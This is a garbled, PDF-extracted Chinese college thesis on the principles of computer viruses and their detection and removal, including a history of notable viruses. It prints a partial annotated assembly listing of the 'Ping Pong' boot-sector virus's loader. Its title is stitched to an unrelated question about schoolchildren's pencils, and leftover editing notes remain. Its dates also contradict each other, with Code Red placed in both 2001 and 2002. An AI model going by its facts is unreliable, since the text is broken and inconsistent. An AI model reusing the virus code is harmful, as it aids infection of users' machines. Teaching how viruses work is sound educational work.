小学生用hb还是2b铅笔好计算机病毒的原理与防范查杀毕业论文

2021年1月18日发(作者：路铎)
淮安信息职业技术学院

计算机病毒的原理与防范查杀毕业论文


目

录

摘

要
....... .................................................. .........
错误！未定义书签。

目

录

.
......................................... ..................................... II

第一章

绪论

.
.................. .................................................. ........
1

1.1
前言
............ .................................................. .................................................. .............................................
1

1.2
论文目标
................... .................................................. .................................................. ..............................
1

1.3
课题研究的意义
.................................. .................................................. .................................................. ...
2

第二章

计算机病毒概述

.... .................................................. .............
3

2.1
计算机病毒定义
.. .................................................. .................................................. ...................................
3

2.2
宏和宏病毒的概念
......................... .................................................. .................................................. ........
4

2.2
计算机病毒的基本特征
..... .................................................. .................................................. .....................
5

2.2.1
感染性

.................................. .................................................. .................................................. .......
5

2.2.2
潜伏性（隐蔽性）
..... .................................................. .................................................. ................
5

2.2.3
可触发性

.............................................. .................................................. .........................................
5

2.2.4
破坏性

.............. .................................................. .................................................. ...........................
6

2.3
计算机病毒的分类
................................. .................................................. ..................................................
6

2.3.1
传统的计算机病毒
............. .................................................. .................................................. ........
6

2.3.2
计算机病毒的发展简史
.. .................................................. .................................................. ...........
7

第三章

计算机病毒的结构和作用机制
............................ .......................... 14

3.1
计算机病 毒的结构组成
........................................ .................................................. ..................................
1
4
3.2
病毒的引导部分
.......................... .................................................. .................................................. .........
1
5
3.2.1
病毒的引导模块和引导机制
............................. .................................................. ........................
1
5
3.3
恢复系统功能
............................ .................................................. .................................................. ............
1
6
3.3.1
病毒引导部分举例
.................................................. .................................................. ...................
1
6
3.4
病毒的感染部分
.................................. .................................................. .................................................. .
2
0
3.4.1
病毒的感染模块及感染机制
...... .................................................. ...............................................
2
0
3.4.2
感染部分程序的举例
........... .................................................. .................................................. ....
2
0
3.5
病毒的表现（破坏）部分

.< br>............................................... .................................................. ......................
2
4
3.5.1
病毒的表现（破坏）模块及表现（破坏）机制

.
............ .................................................. .........
2
4
3.5.2
表现部分程序举例
.. .................................................. .................................................. .................
2
5
3.6
宏病毒的运行机制
................................. .................................................. ................................................
3
1

第四章

检测计算机病毒的基本方法
.. .................................................. .... 34

4.1
外观检测法
................ .................................................. .................................................. ...........................
3
4

4.1.1
屏幕显示异常
......................... .................................................. .................................................. ..
3
4
4.1.2
声音异常

......... .................................................. .................................................. ..........................
3
4
4.1.3
系统工作异常
................................... .................................................. ..........................................
3
5
4.1.4
文件异常

............ .................................................. .................................................. .......................
3
5
4.2
计算机病毒检测的综合方法

.
.................... .................................................. .............................................
3
6

4.3
检测宏病毒的基本方法
......... .................................................. .................................................. ...............
4
1

第五章

清除计算机病毒的基本技术
............................. ........................... 43

5.1
清除计算机病毒的一般性原则

.
................... .................................................. ..........................................
4
3

5.2
清除宏病毒的基本方法
......... .................................................. .................................................. ...............
4
5

第六章

总结

.
.............................. ............................................. 46


II

致

谢
..... .................................................. ......................... 47

参考文献

.
............................................. ................................. 48


III
第一章

绪论

第一章

绪论

1.1
前言

计算机技术的迅猛发展，给人们的工 作和生活带来了前所未有的便利和效
率，随着计算机走进社会的各个领域，走进千家万户，计算机系统已 经能实现生
活、管理、办公的自动化，成为人类社会不可或缺的一部分。与此同时，计算机
安全 的重要性也被越来越多的人认识到，商业界、金融银行界要依靠计算机处理
事务，政府的行政管理要依靠 计算机信息系统和数据库，厂家和公司的全部生产
取决于数据处理系统的能力，陆、海、空、宇航等指挥 系统，医疗卫生要依靠计
算机技术，整个社会对计算机信息系统的依赖越来越大，甚至离不开它。然而，
计算机系统并不安全，其不安全因素有计算机信息系统自身的、自然的，也有人
为的。计算机系 统就是最不安全的因素之一。随着信息化社会的发展，计算机病
毒的威胁日益严重，迄今为止，已发现的 病毒种类很多，而且还以相当惊人的速
度递增，令人们谈病毒而色变。人们将计算机病毒称之为“
21
世纪最大的隐患”
、
“不流血的致命武器”
，它的出现完全有可能改变 人类的未来，因此反病毒的任
务变得更加艰巨了。

1.2
论文目标

1
、
为了
培养
学生
严肃认真的 科学态度和实事求是的工作作风，形成正确的
世界观和价值观，掌握科学的方法论。

2
、
为了
培养
学生
综合应用所学基础理论、专门知识、基本技能的发 现。分
析、解决与电脑中了病毒的实际问题的能力，以及从事其他科学研究工作或负担
专门技术 工作的基本能力。

3
、
为了能
让稍微了解电脑的人们在自己电脑中 了病毒时能够自己动手解决

1
淮安信息职业技术学院

不已。

1.3
课题研究的意义

当今社会是一个信息化 的社会，随着
internet
的出现使得信息出现了爆炸性
的增长。从而使得信息泛 滥成灾，严重的影响了重要信息和知识的传播。随着
internet
的普及，
互联网 以一股巨大变革力量的面貌出现在商务关系领域。
它的强
大功能被人们深刻的记着，并且已经在 各个领域发挥着越来越重要的作用。

但是，计算机病毒的出现将成为计算机使用者的噩梦，它 的功能就是破坏，
破坏计算机里的一切信息，甚至会破坏计算机本身的硬件，使得计算机使用者无
法使用，不仅仅是对计算机使用者而言，对使用计算机的公司也会造成巨大的损
失。如果能够对计算机 病毒有足够的了解，就会对计算机病毒进行防范，即使中
了病毒也能去解决，从而不会造成很大的损失。


2
第二章

计算机病毒概述

第二章

计算机病毒概述

2.1
计算机病毒定义

计算机病毒是一个程序
,
一段可执行码。像生物病毒一样
,
计算机病毒有其
独特的复制能力
,
可以很快地蔓延
,
又常常难以根除
,
它们能把自身附着在各种
类型的文件上
,
当文件被复制或从一个用户传送到另一个用户时
,
它们就随同文
件一起蔓延开来。现在
,
随着计算机网络的发展
,
计算机病毒和计算机网络技术
相结合
,
蔓延的速度更加迅速。在生物学中
,
病毒是指侵入动植物体等有机生命
体中的具有感染性、潜伏性、破坏性的微生物
, < br>而且不同的病毒具有不同的诱发
因素。
“计算机病毒”一词是人们联系到破坏计算机系统 的“病原体”具有与生
物病毒相似的特征
,
借用生物学病毒而使用的计算机术语。< br>“计算机病毒”
一词最
早出现在美国作家
Thomas J . Ryan
于
1977
年出版的科幻小说《
The Adolescence
of P-1
》中。

1983
年
,
美国计算机安全专家
Frederick
Cohen
博士首次提出计算机病毒的
存在
,
他认为：

计算机病毒是一个能感染其他程序的程序
,
它靠修改其他程序
,
并把自身的拷贝嵌入其他程序而实现病毒的感染。
1989
年
,
他进一步将计算机病
毒定义为：
“病毒程序通过修改其他程序的方法将自己的精确拷贝或可能演 化的
形式放入其他程序中
,
从而感染它们”
。所谓感染
,
是指病毒将自身嵌入到指令序
列中
,
致使执行合法程序的操作招致病毒程序的共同执行
(
或是以病毒程序的执
行取而代之
)
。

1994
年《中华人们共和国计算机安全保护条例》定义：
“计算机病毒是指编
制或者在计算机程序中 插入的
,
破坏计算机功能或数据、影响计算机使用
,
并能
自我复制的一组计算机指令或者程序代码”
。
当然
,
还有其他人的不完全相同的定
义
,
但都大同小异
。


3
淮安信息职业技术学院

2.2
宏和宏病毒的概念

宏病毒与传统的计算机病毒有很大的不同，它不感染
. EXE
、
. COM
等可执
行文件
,
而是将病毒代码以宏
( Macro)
的形式潜伏在
Microsoft Office
文件中
,
当
采用
Office
软件打开这些染毒文件时
,
这些代码就会被执行并产生破坏作用。由
于宏是使用
Visual Basic For Application
这样的高级语言编写的
,
因此其编写过
程相对比较简单
,
而功能又十分强大。随着
Microsoft Office
软件在全世界范围内
的不断普及
,
宏病毒已成为传播最广、危害最大的一类病毒。

由于在目前发现的宏病毒当中
,
感染
Word
的病毒占绝大多数
,
所以人们谈
论的宏病毒一般是指
Word
宏病毒
,
而了解
Word
宏病毒之后
,
也就不难理解其
他的宏病毒了。在
Windows
环境下数据文件是由
Word
等文字处理软件建立的
,
被称为文档文件或文档。
Word
文档中包含两种信息：

一是文本信息或称文本
,
是由中英文文字组成的段落篇章
;
二是格式信息
,
包括表格、字体、字号等信息。

在
Microsoft Word
中对宏的定义为“宏就是能够组织在一起的
,
可以作为一
个独立命令来执行的一系列
Word
命令
,
它能使日常工作变得容易”。简单地讲
,
宏就是一组批处理命令
,
是用高级语言
( VB)
编写的一段程序。
Word
文档中的格
式信息就包含了很多这样的宏。
Word
的宏语言有十分强大的功能
,
它具备访问
系统的能力
,
可以直接运行
DOS
系统命令
,
调用
Windows API
、
DLL
等。这些
操作都可能对系统的安全直接构成威胁。

如果一个宏中包含了上述形式的有破坏能力的命令
,
并且还有自我复制功能
,
这个宏就成了宏病毒。概括起来讲
,
宏病毒就是使用宏语言编写的有一定破坏能
力的程序
,
可以在一些数据处理系统中运行
(
主要是微软的办公软件系统
,
字处
理、电子数据表和其他
Office
程序中
) ,
存在于字处理文档、数据表格、数据库、
演示文档等数据文件中
,
利用宏语言的功能将自己复制到其他数据文档中。

除了
Word
宏病毒外
,
常见的还有
Excel
宏病毒、
PowerPoint
宏病毒等
,
主要

4
第二章

计算机病毒概述

是针对
Microsoft Office
软件的。

2.2
计算机病毒的基本特征

2.2.1
感染性

计算机病毒 的感染性是指计算机病毒具有把自身复制到其他程序中的特性。
感染性是计算机病毒的根本属性，它是判 断一个程序是否为病毒程序的主要依
据。病毒它可以感染文件、硬盘、个人计算机、局部网络和互联网。 计算机病毒
的感染是指从一个网络侵入另一个网络，由一个系统扩散到另一个系统，由一个
磁盘 进入到另一个磁盘，或者由一个文件传播到另一个文件的过程
。

2.2.2
潜伏性（隐蔽性）

计算机病毒的潜伏性是指其具有依附于其他媒体而寄生的能力，即 通过修改
其他程序而自身的复制品嵌入到其他程序或磁盘的引导区
(
包括硬盘的主引导区
中
)
寄生。这种能力是隐蔽的，大多数计算机病毒的感 染速度极快。而且大多数
计算机病毒都采用特殊的隐藏技术，例如有些计算机病毒感染正常程序时将程序
文件压缩，留出空间嵌入计算机病毒程序，这样使被计算机病毒感染的程序文件
的长度变化很小 ，很难被发现；有些计算机病毒修改文件的属性等；还有些计算
机病毒可以加密、变型
(
多态病毒
)
或防止反汇编、防跟踪等等都是为了不让被
感染的计算机用户发 现。当计算机病毒侵入系统后，一般并不立即发作，而是具
有一定的潜伏期。在潜伏期，只要条件许可， 病毒就会不断地进行感染。

2.2.3
可触发性

计算机病毒一 般都有一个触发条件：
或者触发其感染
,
，
即在一定的条件下激
活一 个计算机病毒的感染机制使之进行感染；或者触发其发作，即在一定条件下

5
淮安信息职业技术学院

激活计算机病毒的表现
(
破坏
)
部分。条件判断是计算机病毒自身特有的功能，

一种计算机病毒一般设置一定的触发 条件。病毒程序在运行时，每次都要检测控
制条件，一旦条件成熟，病毒就开始感染或发作。触发条件可 能是指定的某个时
间或日期、特定的用户识别符的出现、特定文件的出现或使用次数、用户的安全
保密等级、某些特定的数据等等。

2.2.4
破坏性

计算机 病毒的破坏性是病毒的重要特征，如果一个计算机病毒对计算机没有
任何破坏的坏，那么这个病毒还有什 么用呢？当然，计算机病毒的破坏性取决于
设计者的目的水平，如果病毒设计者的目的在于破坏系统的正 常运行，则可以毁
掉或修改系统内的部分或全部数据或文件，例如改写文件、删除文件、格式化磁
盘等等；可以干扰或迷惑用户的操作，例如锁死键盘或修改键盘的功能等等；可
以干扰系统的运行，如 干扰屏幕显示、降低机器的运行速度等等；也可以损坏硬
件
(
主板
,
磁盘等
)
。

归纳起来，计算机病毒的危害大致有以下几个方面：

1
、对计算机数据信息进行直接的破坏

2
、抢占系统资源

3
、影响计算机运行速度

4
、病毒对计算机硬件的破坏

2.3
计算机病毒的分类

2.3.1
传统的计算机病毒

1
、按计算机病毒攻击的机型分类：有攻击微型机的病毒 、攻击小型机的病
毒和攻击工作站的病毒。


6
第二章

计算机病毒概述

2
、按计算机病毒攻击的操作系统分类：有攻击
D OS
的病毒、攻击
Windows
系统的病毒、攻击
Unix
或OS/2
系统的病毒。

3
、按传播媒介分类：有单机病毒、网络病毒。

4
、按计算机病毒 的寄生方式分类：有源码型病毒、入侵型病毒、外壳型病
毒、操作系统型病毒。

5
、按病毒的表现（破坏）分类：有良性病毒、恶性病毒。

6
、按 计算机病毒寄生方式和感染途径分类：有引导型病毒、文件型病毒、
混合型病毒。

2.3.2
计算机病毒的发展简史

写得太多

简单一点

计算机刚刚诞生
,
就有了计算机病毒的概念。
1949
年
,
计算机之父冯·诺依< br>曼在《复杂自动机组织论》中便定义了病毒的基本概念。他提出“一部事实上足
够复杂的机器能够 复制自身”
,
但当时的人们还不能理解能够复制自身的概念
(
而能够复制自身正是计算机病毒的本质特征之一
)
,
所以并没有多少人认真对
待计算机病毒这种事情。

20
世纪
60
年代初
,
美国贝尔实验室里
,3
个年轻的程序员编写了一个名为
“磁芯大战”的游戏
,
游戏中通过复制自身来摆脱对方的控制
,
这就是所谓“计
算机病毒”的第一个雏形。而“计算机病毒”作为一个名词
,
最早出现在科幻小
说之中。
1975
年
,
美国科普作家
John Bruner(
约翰·
布鲁勒尔
)
在他的名为
《
Shock
Wave
Rider
》
(
《震荡波骑士》
)
的书中
,< br>出现了以“
Virus
”用电脑作为邪恶代表
的工具的故事。
1977
年
,
美国的
Thomas J . Ryan(
托马斯·简·瑞恩
)
在其名为
《
The Adolescence of P-1
》
(
《
P-1
的青春》
)
的科幻小说中
,
幻想

出世界上第一个计算机病毒
,
它可以从一台计算机感染到另一台计算机
,
最
终控制了
7000
台计算机的操作系统
,
造成了一场大灾难。


7
淮安信息职业技术学院

1981
年
,
世界上诞生了真正意义上的计算机病毒———
Elk
Cloner
,
这个病
毒将自己附着在磁盘的引导扇区上
,
通过磁盘进行感染。由于它没有造成多大的
破坏
,
只是关掉显示器
,
让显示的文本闪烁或显示一大堆乱七八糟的信息
,
所以
,
它没有引起大家的关注。

1983
年
,
计算机病毒首次在计算机界被确认存在。
1983
年
11
月
3
日
,
美国
计算机安全学术讨论会上
,
美国计算机安全专家
Frederick
Cohen
博士首次提出
计算机病毒的概念。同一天
,
专家们在运行
Unix
操作系统的
V
AX11/
750
计算机
系统上验证了计算机病毒的存在。在其后的一周内
,
在
5
次病毒试验中
,
平均
30
分钟病毒就可使计算机系统瘫痪
,
由此不仅确认了计算机病毒的存在
,
而且认识
到计算机病毒对计算机系统的破坏作用。

1986
年底
,
病毒
Brain
开始流行
,
这是由巴基斯坦两兄弟
Basit
和
Amjad
Farooq
Alvi
制造的
,
据他们说
,
制作这个病毒的目的是检验一下盗版问题在巴基
斯坦的严重程度
(
事实上
,
病毒的蔓延远远超出了他们的估计
)
。
Brain
病毒首次
使用了伪装的手段来迷惑计算机用户。
1987
年
10
月
,
美国新闻机构报道了这一
例计算机遭病毒入侵及引起破坏的事件
,
从此计算机病毒开始受到广大民众的关
注。

在这一年
,
中国的公安部成立了计算机病毒研究小组
,
并派出专业技术人员
到中科院计算所和美国、欧洲进修
,
学习计算机安全技术
,
标志着计算机病毒引
起了中国政府的警惕。

1987
年
,
病毒现象逐步升温
,
这一年
,DOS
环境下的文件型病毒得到了很大
的发展
,
同时出现了很多的
IBM PC
兼容机上的病毒。这一年
,
首次出现了能自我
加解密的
Cascade
病毒
,
标志着计算机病毒制造技术的进一步提高
,
这也说明了
病毒与反病毒技术的互相对抗、克制
,
能自我加解密的病毒还有著名的新西兰的
Stoned
病毒和意大利的
PingPong
病毒等等。同年
12
月份
,
第一个网络病毒——

8
第二章

计算机病毒概述

—
Christmas
Tree
病毒———开始流行
,
这种病毒在
VM/
CMS
操作系统下传播
,
造成了
IBM
公司内部网络的系统瘫痪。
1988
年
6
月
13
号
,
这天正好是星期五
,
一些国家的公司和大学遭到了
“耶路撒冷”
( Jerusalem)
病毒的攻击。
该病毒因攻
击了耶路撒冷大学而得名
,
又因为它是在非
1987
年的既是
13
号又是星期五的这
天爆发
,
所以又被称为“黑色星期五”
。

1988
年
,
各种计算机病毒相继出现并广泛传播。
11
月
2
日
,
美国康奈尔大
学的学生
,23
岁的
Morris
将自己编制的蠕虫程序输入到计算机网络中
,
在几小时
内造成
Internet
的堵塞
,6 000
多台计算机被感染
,
造成巨大的损失。
从此在国际计
算机领域掀起了一个谈论病毒的高潮
,
一时成为计算机界的热点。在美国
,
仅
1988
年中
,
就约有
9
万台计算机遭计算机病毒入侵
,
大家公认
1988
年为世界计
算机病毒年。

1988
年
11
月
,
《人民日报》
就
Morris
事件报道了关于病毒的事件
,
这是国内
媒体首次关注计算机病毒。

同时
,
反病毒技术也已经开始成熟了
,
所罗门公司的反病毒工具———
Doctors Solomon
’
sAnti- Virus Toolkit
———成为当时最强大的反病毒软件。

1989
年
,
病毒家族开始出现了
,
比如
Yankee
病毒
(
这是一个恶性病毒
,
会
格式化硬盘
)
。同年出现的
Eddie
病毒则可以驻留内存
,
不仅感染被调用的文件
,
还感染被打开或被拷贝的文件。
Frodo
病毒是第一个全秘密寄生的文件病毒
,
它
不改变被感染文件的长度。同年出现了名为
AIDS
的特洛伊木马型病毒
,
作者
Popp
博士因靠此病毒为受害者恢复数据勒索钱财而被捕入狱。

1989
年
4
月西南铝厂首先报告在其计算机中发现“小球”病毒。同年
,
又有
一些单位的计算机也发现“小球”病毒及其变种或其他病毒
,
自此
,
计算机病毒
开始侵入我国
(
没有记录的病毒侵入肯定更早
)
。

1989
年
7
月
,
中国公安部推出了中国最早的杀毒软件
Kill
6 .0
,
Kill
软件在

9
淮安信息职业技术学院

随后很长的一段时间内都是由公安部免费向国内部分用户发放。

1990
年
,
出现了第一个多态病毒
Chameleon
、
使用多级加密解密和反跟踪技
术的病毒
Whale
等具有更好隐藏技术的病毒
,
标志着病毒制造技术的又一次提
高。同年
,
保加利亚的程序员开发出了可以用于开发病毒的工具软件———
Virus
Production
Factory
;
同样在保加利亚
,
同年出现了专门为病毒制造者开设的进行
病毒信息交流和病毒交换的
BBS
。

1990
年
,
中国出现了基于硬件的反病毒系统———华星防病毒卡
,
取得不
错的销售业绩。

1991
年
,
计算机病毒的数量持续上升
,
世界上已知病毒的总数已向
1000
攀
升。这一年发现的比较有名的病毒有能够同时感染文件和引导区的复合多态病毒
Tequi la
;
不存在于某个文件或引导扇区中的
DIR
II
病毒
,
它将自己分成小块
,
然
后放在磁盘上的多个扇区中
,
运行的时候再进行组装和执行
;
攻击网络的
GPI
病
毒等。

这一年
,
反病毒公司也得到了发展壮大
,Symantec(
著名的反病毒工具软件
Norton
就是它的产品
)
和
Central
Point(
以软件
PCTOOLS
著名
)
两个重要的工
具软件开发商开始介入杀毒市场。中国的瑞星公司成立
,
推出了瑞星防病毒卡。

1992
年
,
多态病毒生成器“
MtE
”开发出来
,
同年
,
一个病毒构造工具集—
——
Virus CreateLibrary
———开发成功。这些病毒开发工具或一些
BBS
的出现
又刺激了新的、更加强大和完善的病毒制造工具被不断开发出来
,
所有这些病毒
制造工具或
BBS
上的信息交流促使了更多的病毒被源源不断地制造出来。
这一年
,
在芬兰发现了首例
Windows
病毒。

1993
年、
1994
年
,
采用密码技术、编写技巧高超的隐蔽型病毒和多态性病
毒相继出现
,
而且社会上出现了计算机病毒的恐慌和骗局
,
也出现了感染源代码
文件
(
主要是
C
语言和
Pascal
语言
)
的
Src
Vir
病毒和感染
OBJ
文件的
Shifter
病

10
第二章

计算机病毒概述

毒。在这两年中
,
中国的杀毒软件
KILL(
V68)
和
KV100
开始销售
1995
年
8
月
9
日
,
在美国首次发现专门攻击
Word
文件的新病毒———宏病毒
Concept
。
以前的
病毒都是在
DOS
或
Unix
操作系统下感染和破坏的
,Concept
病毒的出现
,
宣告了
攻击
Windows
操作系统的病毒的大规模出现。

1996
年和
1997
年开始了新一轮的计算机病毒的进化
,
随着微软新的操作系
统
Windows 95
、
Windows NT
和微软办公软件
Office
的流行
,
病毒制造者开始面
对新的环境
,
制造出了许多新的病毒。
1997
年
2
月
,
第一个
Linux
环境下的病毒
Bliss
出现
,
结束了
Linux
系统从未被病毒感染的历史。
1997
年
4
月
,
第一个使用
文件传输协议
( FTP
：
FileTransport Protocol)
进行传播的
Homer
病毒出现。

1998
年
6
月
,
被称作有史以来影响最大的病毒———
CIH
病毒———被发
现
,
这是世界上首例能够破坏硬件的病毒
,
它既攻击硬盘中的文件系统
,
又攻击
计算机硬件
(
主板
) ,
并使其损坏。它的破坏性使其闻名世界。这一年也出现了许
多新型病毒
,
如远程控制工具“
Back
Orifice
”
、
“
Netbus
”等
,
第一个感染
Java
可
执行文件的
Strange
Brew
病毒
,
一种新的用实用
VB
脚本语言编写的
Robbit
病
毒。
后
3
种类型的病毒以及这
3
种技术结合产生的病毒
(
还有以后一些新的技术
)
都是之后直到现在最流行的病毒。

1999
年
,
通过邮件进行病毒传播开始成为病毒传播的主要途径
,
而宏病毒
仍然是最流行的病毒。这一年
,
比较有名的病毒有：
Melissa ,
一种宏病毒和蠕虫
的
混
合
物
,
通
过电
子
邮
件
系
统
大
量
传
播,
造
成
网
络
的
阻
塞
、
瘫< br>痪
;Happy99 FunLove
等等。

2000
年被称作
VBScript
病毒
/
蠕虫之年。
大量使用脚本技术的病毒出现
,
脚
本病毒和蠕虫、传统的病毒、木马程序以及操作系统的安全漏洞相结合
,
给病毒
技术带来了一个新的发展高峰。
VBS/ KAK
蠕虫利用因特网浏览器和
Outlook
中
的漏洞
(
Scirptlet
.Typelib
和
Eyedog)
,
靠用户用
Outlook
打开或预览一个含有病

11
淮安信息职业技术学院

毒性
VBScript
的
HTML
文件而使用户的机器感染
;Loveletter
病毒则是以给电子
邮件的附件两个扩展名的诡计
( Love- Letter- for you .txt .vbs)
来得到比
Melissa
病
毒更快更远的传播。

2000
年
,
中国的金山公司发布金山毒霸
,
金山公司开始进入杀毒软件市场。

2001
年可谓是计算机安全领域的多事之秋。
7
月出现的
Code
Red
和
Code
Red
II
,
特别是
9
月出现的
Ni
mda
病毒
(
以
36
.07
%
高居本年度病毒感染率第
一
)
,
更是突破了以往病毒的各种传播途径
,
它们会利用微软服务器漏洞植入后
门程序的特洛伊木马
,
或是通
E- mail
大肆传播、衍生无数变种的计算机蠕虫
,
也
有可能是通过浏览网页下载病毒
,
甚至三者兼具
,
造成了大范围的因特网上的服
务器被阻断或访问速度下降
,
在世界范围内造成了巨大的损失。
仅
Code Red
病毒
所造成的经济损失
,
就远远超过过去
6
年来任何一年的年度损失。根据趋势科技
TrendLabs
全球防病毒研发暨技术支持中心所做的
2001
年十大病毒统计
,
蠕虫、
特洛依木马型病毒占绝大部分
,
自
1995
年起持续
6
年为病毒主要形态的宏病毒
已退居十大病毒之外
,
而
E- mail
仍为传播病毒的热门渠道。

2001
年前病毒的形态非常单纯
,
依其感染的方式
,
可分为感染开机区的开
机型、
感染执行文件的文件型、
感染
Word
文件的文件宏病毒型等等。
而自从
2002
年
7
月
,Code
Red
利用
IIS
漏洞揭开了黑客与病毒并肩作战的反传统的攻击模
式
,Code
Red
在病毒史上的地位
,
就如同第一个病毒
Brain
一样
,
具有难以抹灭
的历史意义。
同时这种反传统的攻击模式
,
使得传统的防毒软件面临更高的挑战。
从首例计算机病毒被发现起
,
病毒的发展速度十分惊人
(
虽然各种说法不尽相
同
)
。按照较多的一种说法
,1988
年底
,
病毒不足
100
种
;1987
年到
1989
年间发
现的计算机病毒有
80
多种
;1991
年
,
全球病毒数量不到
500
种
;1994
年夏
,
病毒
的数量已近
5000
种
;
到
1998
年夏
,
全世界已发现的病毒超过
15
000
种
;
到
2000
年底
,
病毒的数量已超过
55
000
种
;
到了
2002
年
,
病毒数量已增至
60000
种。

12
第二章

计算机病毒概述

2000
年
12
月在日本东京举行的“亚洲计算机反病毒大会”对
2000
年
11
月以前
的病毒种类和数量作出了初步的报告：

DOS
病毒：

40 000
种

Windows 32
病毒：

15
种

Windows 9x
病毒：

600
种

Windows NT/ Windows 2000
病毒：

200
种

Word
宏病毒：

7500
种

Excel
宏病毒：

1500
种

PowerPoint
病毒：

100
种

Script
脚本病毒：

500
种

Macintos
苹果机病毒：

50
种

Linux
病毒：

5
种

手机病毒：

2
种

合计：

55000
种

在病毒的发展史上
,
病毒的出现是有规律的。一般情况下
,
一种新的病毒技
术出现后
,
病毒迅速发展
,
接着反病毒技术的发展会抑制其流传
;
操作系统进行
升级时
,
病毒也会调整为新的方式
,
产生新的病毒技术。


13
淮安信息职业技术学院

第三章

计算机病毒的结构和作用机制

3.1
计算机病毒的结构组成

计算机病毒是一段特殊程序，
它的其最大特点是具有感染能力和表现
(
破坏
)
能力。计算机病毒在程序结构、磁盘上的存储方式、感染目标的方式以及控制 系
统的方式上既具有许多共同的特点，同时又有许多特殊的技巧和方法，了解病毒
程序的这些结 构和特征对于有效地预防、检测和清除病毒是非常有必要的。

计算机病毒与生物病毒一样，有其自身的病毒体
(
病毒程序
)
和 寄生体。寄
生体为病毒提供一种生存环境，当病毒程序寄生于合法程序的时候，病毒就成为
了程 序的一部分，并在程序中占有合法的地位，这样合法程序就成了病毒程序的
寄生体，或称病毒程序的载体 。病毒可寄生于合法程序的任何位置。

计算机病毒之所以具有寄生能力
和破坏能力， 和病毒程序的结构有关。
从目前已出现的病毒来看，
病毒都具有
相同的逻辑程序结构如 图
3 .1
所示，
一






图
3.1
计算机病毒的程序结构

般包含
3
大模块即：
引导模块、
感
染模块和表现
(
破坏
)
模块。其中后两个模块都包括一段触发条件检查程序段，
它们分别检查是否满足触发条件和是否 满足表现
(
破坏
)
的条件，一旦相应的条
件得到满足，病毒就会进行感染和表现
(
破坏
)
。

引导模块的功能是将病毒程序引入内存并使其后面的两 个模块处于激活状
态，感染模块的功能是，在感染条件满足时把病毒感染到所攻击的对象上；表现
(
破坏
)
模块的功能是，
在病毒发作条件
(
表现、
破坏条件
)
满足时，
实施对系统
的干扰和破坏活动。


14
第三章

计算机病毒的结构和作用机制

3.2
病毒的引导部分

3.2.1
病毒的引导模块和引导机制

引导模块的主要作用是将静态病毒激活，使之成为动态病毒。动态病毒是指
要么已进入内存处于活动状 态的病毒，要么能通过调用某些中断而获得运行权，
从而它就可以随心所欲。

病毒程 序的加载分为两个步骤：一是系统加载过程
;
二是病毒附加的加载过
程。
系统 加载过程通常读入病毒程序的引导部分
,
并将系统控制权转交病毒引导程
序。
病毒引导程序一般都是病毒附加的加载过程
,
它主要用来完成对病毒程序的完
整读入和 安装。病毒程序选择的加载点、目标多是计算机的固有弱点或软件系统
的输入节点。

具体的说，病毒的加载过程，主要有
3
个步骤组成：

1
、开辟内存空间

病毒要起作用，就必须驻留内存，要想驻留就必须开辟内 存空间或直接覆盖
系统占用的部分内存。

2
、病毒体定位和驻留

病毒进入内存后即脱离原载体程序，在内存驻留区域进行重定位，而且对内
存中的病毒程序采取 一定的保护措施，使之不会被正常程序覆盖掉。病毒驻留内
存后，要对内存中的病毒程序设定某种激活方 式，使之在适当的时候能取得运行
权，这就必须使病毒的有关组成单元取代或扩充系统的原有功能，包括 改写中断
向量，设置激活、感染、表现
(
破坏
)
条件，初始化内 部各数据单元等。在取得
控制权后，病毒依据自身条件的制约，在适当的条件下进行感染和破坏。


15
淮安信息职业技术学院

3.3
恢复系统功能

为保证病毒驻入的系统能继续有效工作，提高隐蔽性， 大多数病毒程序将病
毒破坏的有关信息转储于其他特定单元，允许系统通过病毒程序使用。

3.3.1
病毒引导部分举例

例：
“小球”病毒的引导部分的程序片段

病毒的引导程序主要进行以下操作：

修改内存可用空间的大小，病毒首先在内存的最高端预留出
2 kB
存储空间；

将病毒的引导程序模块及有关参数从
0000
∶
7C00H
处移到该区域中，
然后把
控制转向该区域的病毒程序处开始执行；

在标为“坏”磁盘扇区中装有病毒程序的另一部分，将其装入并连接到病毒
引导模块之后；

将原
DOS
的正常引导程序读入内存中病毒程序引导模块腾出来的
0000
∶
7C00H
处；

初始化参数，修改
INT 13H
中断向量，使它指向病毒的感染模块的入口；

将控制权还给
DOS
引导程序，开始执行真正的系统的引导。

下面代码少写或者不写。

0000
∶
7C00 EB1C JMP 7C1E
. . . . . . . . .
0000
∶
7C1E 33C0 XOR AX
，
AX
0000
∶
7C20 8ED0 MOV SS
，
AX
0000
∶
7C22 BC007C MOV SP
，
7C00
0000
∶
7C25 8ED8 MOV DS
，
AX
0000
∶
7C27 A11304 MOV AX
，
[ 0413]
；
[ 0413] =
内存空间大小


16
第三章

计算机病毒的结构和作用机制

0000
∶
7C2A 2D0200 SUB AX
，
0001
；内存总量减去
2 kB
，以防

0000
∶
7C2D A31304 MOV [ 0413]
，
AX
；用户程序覆盖

0000
∶
7C30 B106 MOV CL
，
06
；计算最高段地址

0000
∶
7C32 D3E0 SHL AX
，
CL
0000
∶
7C34 2DC007 SUB AX
，
07C0
；如内存为
640K
，
AX= 07C0
把病毒程序的第一部分从
0000
∶
7C00H
～
0000
∶
7DFFH
搬到内存高端留出
的
2 kB
空间中，位 置为
97C0
∶
7C00H
～
97C0
∶
7DFF H
。

0000
∶
7C37 8EC0 MOV ES
，
AX
0000
∶
7C39 BE007C MOV SI
，
7C00
0000
∶
7C3C 8BFE MOV DI
，
SI
0000
∶
7C3E B90001 MOV CX
，
0100
0000
∶
7C41 F3 REPZ
；将
[ 0000
∶
7C00H]
→
[ ES
∶
7C00]
0000
∶
7C42 A5 MOVSW
；传送
256
个字

0000
∶
7C43 8EC8 MOV CS
，
AX
；
CS=
病毒程序段地址

97C0
∶
7C45 0E PUSH CS
97C0
∶
7C46 1F POP DS
97C0
∶
7C47 E80000 CALL 7C4A
97C0
∶
7C4A 32E4 XOR AH
，
AH
97C0
∶
7C4C CD13 I NT 13
；复位磁盘

97C0
∶
7C4E 8026F87D80 AND BYTE PTR[ 7DF8]
，
80
97C0
∶
7C53 8B1EF97D MOV BX
，
[ 7DF9]
；
[ 7DF9] =
病毒第二部分的开始

97C0
∶
7C57 0E PUSH CS
；逻辑扇区号

97C0
∶
7C58 58 POP AX
97C0
∶
7C59 2D2000 SUB AX
，
0200

17
淮安信息职业技术学院

97C0
∶
7C5C 8EC0 MOV ES
，
AX
97C0
∶
7C5E E83C00 CALL 7C9D
；读病毒第二部分程序

97C0
∶
7C61 8B1EF97D MOV BX
，
[ 7DF9]
97C0
∶
7C65 43 I NC BX
；
BX=
原引导记录所在逻辑扇区号

97C0
